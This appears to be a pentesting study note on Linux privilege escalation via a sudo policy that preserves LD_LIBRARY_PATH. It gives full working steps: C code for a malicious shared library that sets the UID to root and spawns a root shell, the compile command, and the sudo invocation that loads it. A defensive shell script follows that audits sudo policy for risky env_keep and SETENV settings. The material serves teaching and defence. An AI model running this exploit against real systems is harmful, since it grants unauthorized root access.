# LD_LIBRARY_PATH

The `LD_LIBRARY_PATH` environment variable contains a set of directories where shared libraries are searched for first.

The `ldd` command can be used to print the shared libraries used by a program:

```bash
$ ldd /usr/sbin/apache2
```

By creating a shared library with the same name as the one used by a program, and setting `LD_LIBRARY_PATH` to its parent directory, the program will load our shared library instead.

Run the `sudo -l` command:

![[Pasted image 20220805233127.png]]

The above example shows that the `LD_LIBRARY_PATH` environment variable is preserved.

Run the following command on apache2:

```bash
$ ldd /usr/sbin/apache2
```

The output will give us a list of shared objects we can replace:

![[Pasted image 20220805233312.png]]

For this example we will use the `libcrypt.so.1` shared object.

Create a file called `library_path.c` with the following contents:

```c
#define _GNU_SOURCE   /* exposes setresuid() in <unistd.h> */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* The constructor attribute makes hijack() run as soon as the library is loaded. */
static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");   /* child processes resolve libraries normally */
    setresuid(0,0,0);              /* set real, effective and saved UID to root */
    system("/bin/bash -p");        /* -p keeps the effective UID */
}
```

Compile the `library_path.c` file into a shared object with the same name as the one being replaced:

```bash
$ gcc -o libcrypt.so.1 -shared -fPIC library_path.c
```

Finally, run apache2 while setting the `LD_LIBRARY_PATH` environment variable to the current directory, which is where we compiled our shared object:

```bash
$ sudo LD_LIBRARY_PATH=. apache2
```

The shared object is loaded and spawns a root shell.

![[Pasted image 20220805234631.png]]
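
The technique above depends on sudo letting `LD_LIBRARY_PATH` through to the privileged command, which can be checked for in the policy text itself. The script below is an added example, not part of the original note: it reads `sudo -l` output or sudoers contents and reports `env_keep` entries that preserve `LD_*` variables, plus the `setenv` option and `SETENV:` tag, which exempt `VAR=value` arguments from the `env_keep` restrictions. The function names `audit_sudo_env` and `sample_policy` and the sample policy are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original note): audit sudo policy text for
# settings that let loader variables such as LD_LIBRARY_PATH reach a
# privileged command. Input is `sudo -l` output or sudoers file contents.

audit_sudo_env() {
    # Drop comments, then put each comma-separated item on its own line.
    sed 's/#.*//' | tr ',' '\n' | awk '
    # env_keep = ... or env_keep += ... (env_keep -= removes, so it is skipped)
    /env_keep[ \t]*[+]?=/ {
        val = $0
        sub(/^.*env_keep[ \t]*[+]?=[ \t]*/, "", val)
        gsub(/"/, "", val)                 # quoted lists: "LANG LD_PRELOAD"
        n = split(val, tok, /[ \t]+/)
        for (i = 1; i <= n; i++)
            if (tok[i] ~ /^LD_/)           # LD_LIBRARY_PATH, LD_PRELOAD, LD_* ...
                print "env_keep preserves " tok[i]
    }
    # setenv and SETENV: lift the env_keep limits on VAR=value arguments.
    # "!setenv" and "NOSETENV:" are the safe forms and are not reported.
    /(^|[ \t])setenv([ \t]|$)/ { print "Defaults setenv is enabled" }
    /(^|[^A-Z])SETENV:/        { print "SETENV: tag on a command" }
    '
}

# Constructed sample resembling `sudo -l` output (not captured from a host).
sample_policy() {
    cat <<'EOF'
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_LIBRARY_PATH, env_keep+="LANG LD_PRELOAD"

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/apache2
EOF
}

# Demo run on the sample. On a real host, pipe in `sudo -l` or the
# contents of /etc/sudoers and /etc/sudoers.d/* instead.
sample_policy | audit_sudo_env
```

Any `env_keep` entry it reports is a candidate for removal with `visudo` unless a specific command genuinely needs it.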